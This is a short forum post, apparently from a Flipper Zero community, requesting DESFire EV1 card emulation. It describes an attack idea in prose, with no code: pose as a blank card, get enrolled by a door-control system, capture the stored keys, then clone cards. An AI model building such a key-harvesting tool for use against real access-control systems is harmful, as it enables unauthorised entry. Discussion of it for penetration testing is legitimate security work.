DESFire EV1 emulation (feature request)

One of the risk factors with DESFire is that if you can emulate a blank card and “enrole” it on to a system as if it was a blank new card, it will have the keys stored. On a real DESFire card those keys are, of course, secure, but if the FlipperZero can emulate a DESFire, it can pretend to be a new card, get keys, and then show those keys and use them to emulate new cards with new data. Any system using common keys, as could be needed for an off line system really, would mean the system as a whole could be compromised.

I have written up the EV1 protocol DESFireAES/DESFire.pages at master · revk/DESFireAES · GitHub and it should not be rocket science to do this? I am not familiar enough with coding for flipper zero yet to do it myself. But I do have EV1 based door control systems here I can test it with.

This seems to fit with pen-test nature of flipper zero.

5 Likes